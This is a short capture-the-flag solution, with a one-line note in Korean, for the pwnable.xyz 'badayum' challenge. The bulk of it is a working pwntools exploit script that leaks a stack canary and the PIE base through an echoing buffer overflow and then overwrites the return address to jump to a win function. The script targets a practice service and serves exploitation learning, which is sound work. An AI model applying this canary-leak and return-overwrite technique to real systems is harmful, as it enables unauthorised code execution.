
일정 확률로 BOF가 터진다. canary와 PIE를 릭한 다음 ret 주소를 win으로 덮으면 된다.
from pwn import *
# Verbose pwntools logging: every send/recv is printed, which helps when
# the overflow only triggers on some attempts.
context.log_level = "debug"

HOST, PORT = "svc.pwnable.xyz", 30027
p = remote(HOST, PORT)
# p = process("./badayum")   # local alternative to the remote tube above

# Offset of the win target inside the PIE image; it is rebased
# (win = pie + win) once the base address has been leaked.
win = 0xd34
def send(data):
    """Wait for the "you > " prompt, then write *data* to the target verbatim.

    Uses ``send`` rather than ``sendline``: no newline is appended, so the
    exact byte count of each payload is what reaches the buffer.
    """
    prompt = b"you > "
    p.recvuntil(prompt)
    p.send(data)
def extract_len():
    """Consume the "me > " echo prompt and return the byte length of the echoed line.

    The length is measured on the raw ``recvline()`` result (which by default
    keeps the trailing newline), so it includes any bytes the target leaked
    past the intended buffer.
    """
    p.recvuntil(b"me > ")
    echoed = p.recvline()
    return len(echoed)
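def find_len(num, max_tries=None):
    """Nudge the target with single "A" bytes until the echoed line is at least *num* bytes.

    The overflow only fires on some iterations (per the author's note), so
    each round sends one more byte and re-measures the echo length.

    Args:
        num: minimum echoed-line length that signals the state we need.
        max_tries: optional cap on the number of "A" sends. ``None`` (the
            default) keeps the original unbounded behaviour, which hangs
            forever if the service never yields a long enough line.

    Returns:
        0 once the threshold is reached (callers ignore the value).

    Raises:
        RuntimeError: only when *max_tries* is given and exhausted.
    """
    tries = 0
    while extract_len() < num:
        if max_tries is not None and tries >= max_tries:
            raise RuntimeError(f"find_len: echo never reached {num:#x} bytes after {tries} tries")
        send(b"A")
        tries += 1
    return 0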
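# Stage 1: leak the stack canary. 0x68 bytes of filler reach the canary's
# low byte; the single "B" overwrites that 0x00 terminator so the echo runs
# past it and prints the remaining 7 canary bytes.
find_len(0x69)
payload = b"A" * 0x68 + b"B"
send(payload)
p.recvuntil(b"B")
# recvn() blocks until exactly 7 bytes arrive. recv(7) returns whatever is
# currently buffered (possibly fewer bytes), which would make u64() fail or
# yield a wrong canary if the echo arrives in more than one segment.
cnry = b"\x00" + p.recvn(7)   # restore the canary's always-zero low byte
canary = u64(cnry)

# Stage 2: leak a return address to recover the PIE base. 0x77 bytes cover
# the canary and the 8-byte slot after it (presumably saved rbp); the "B"
# lands on that slot's last byte so the echo continues into the 6
# significant bytes of the return address.
find_len(0x78)
payload = b"A" * 0x77 + b"B"
send(payload)
p.recvuntil(b"B")
leak = p.recvn(6) + b"\x00\x00"   # canonical user-space address: top 2 bytes are 0
# The leaked return site sits at PIE base + 0x1081.
pie = u64(leak) - 0x1081
win = pie + win

log.info(f"canary: {canary:#x}")
log.info(f"pie: {pie:#x}")
log.info(f"win: {win:#x}")

# Stage 3: rewrite the frame with the real canary, a dummy 8-byte slot and
# win as the return address, then send "exit" so the function returns.
find_len(0x80)
payload = b"A" * 0x68 + p64(canary) + b"A" * 8 + p64(win)
send(payload)
send(b"exit")
p.interactive()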